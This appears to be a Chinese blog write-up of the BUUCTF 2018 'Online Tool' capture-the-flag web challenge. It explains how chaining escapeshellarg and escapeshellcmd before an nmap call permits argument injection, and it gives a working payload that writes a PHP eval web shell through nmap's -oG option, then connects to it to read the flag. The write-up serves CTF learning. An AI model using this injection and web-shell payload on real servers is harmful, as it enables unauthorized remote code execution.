当前位置:网站首页>BUUCTF WEB [BUUCTF 2018]Online Tool
BUUCTF WEB [BUUCTF 2018]Online Tool
2022-04-23 12:27:00 【Y1Daa】
BUUCTF WEB [BUUCTF 2018]Online Tool
-
进入环境,得到一段代码
<?php if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) { $_SERVER['REMOTE_ADDR'] = $_SERVER['HTTP_X_FORWARDED_FOR']; } if(!isset($_GET['host'])) { highlight_file(__FILE__); } else { $host = $_GET['host']; $host = escapeshellarg($host); $host = escapeshellcmd($host); $sandbox = md5("glzjin". $_SERVER['REMOTE_ADDR']); echo 'you are in sandbox '.$sandbox; @mkdir($sandbox); chdir($sandbox); echo system("nmap -T5 -sT -Pn --host-timeout 2 -F ".$host);
其中,
escapeshellarg()
函数用于把字符串转码为可以在 shell 命令里使用的参数,也就是将单引号等特殊符号转义,并将转义后的单引号前后用另外的两个单引号包裹<?php echo escapeshellarg("123"); // '123' echo escapeshellarg("12' 3");// '12'\'' 3' ?>
escapeshellcmd()
函数用于 shell 元字符转义 ,就是在特殊字符和没有配对的单引号前插入\
<?php echo escapeshellcmd("123"); // 123 echo escapeshellcmd("12' 3");// 12\' 3 echo escapeshellcmd("12'' 3");// 12'' 3 ?>
这里可以参照这篇文章 谈谈escapeshellarg参数绕过和注入的问题 (lmxspace.com) 了解本题如何解
-
因为两个过滤的存在,我们只能执行一条命令。在nmap中存在几个参数
OUTPUT: -oN/-oX/-oS/-oG <file>: Output scan in normal, XML, s|<rIpt kIddi3, and Grepable format, respectively, to the given filename.
可以向文件中写入命令和结果
-
这里我们可以利用
escapeshellarg
与escapeshellcmd
一起使用的漏洞构造一个命令执行漏洞?host=' <?php @eval($_POST["cmd"]);?> -oG shell.php '
回显为
you are in sandbox ae49321bc77b6271cb2db4ba23d835f1Starting Nmap 7.70 ( https://nmap.org ) at 2022-04-22 05:26 UTC Nmap done: 0 IP addresses (0 hosts up) scanned in 1.15 seconds Nmap done: 0 IP addresses (0 hosts up) scanned in 1.15 seconds
-
使用蚁剑连接,在文件根目录下找到flag文件
flag{24d949bf-db37-41b9-9e74-9f9e202d0af7}
版权声明
本文为[Y1Daa]所创,转载请带上原文链接,感谢
https://blog.csdn.net/weixin_51412071/article/details/124343895
边栏推荐
- IDEA 代码质量规范插件SonarLint
- Qt绘制图像
- 外包干了五年,废了...
- A graphic designer's fantasy world | ones characters
- Force buckle - 70 climb stairs
- 万事有你 未来可期 | ONES 2022校园招聘正式开启
- XinChaCha Trust SSL Organization Validated
- 论文解读(CGC)《CGC: Contrastive Graph Clustering for Community Detection and Tracking》
- 航芯技术分享 | ACM32 MCU安全特性概述
- QT draw image
猜你喜欢
C# F23. Stringsimilarity Library: String repeatability, text similarity, anti plagiarism
After a circle, I sorted out this set of interview questions..
Qt绘制文字
Running error: unable to find or load the main class com xxx. Application
XinChaCha Trust SSL Organization Validated
worder字体网页字体对照表
Metalama简介4.使用Fabric操作项目或命名空间
IDEA 代码质量规范插件SonarLint
Xinwangda announced that the price of battery products had been increased, and the investment of "weixiaoli" exceeded 1 billion
IDEA 中 .properties文件的中文显示乱码问题的解决办法
随机推荐
Win10 splash screen after startup
STM32工程移植:不同型号芯片工程之间的移植:ZE到C8
远程桌面之终端服务器超出了最大允许连接数解决
第二十六课 类的静态成员函数
Fastjson 2 is coming, the performance continues to improve, and it can fight for another ten years
Basic software testing Day2 - Case Execution
CGC: contractual graph clustering for community detection and tracking
QT interprocess communication
flask项目跨域拦截处理以及dbm数据库学习【包头文创网站开发】
【vulnhub靶场】-dc2
IDEA设置版权信息
Tips for installing MySQL service in windows11: Install / Remove of the Service denied
Step function of activation function
异步时钟亚稳态 的解决方案——多bit信号
Xinwangda announced that the price of battery products had been increased, and the investment of "weixiaoli" exceeded 1 billion
数组---
程序员如何用130行代码敲定核酸统计
Introduction to metalama 4 Use fabric to manipulate items or namespaces
Fabric 1.0 source code analysis (33) implementation of peer channel command and subcommand
NBIOT的AT指令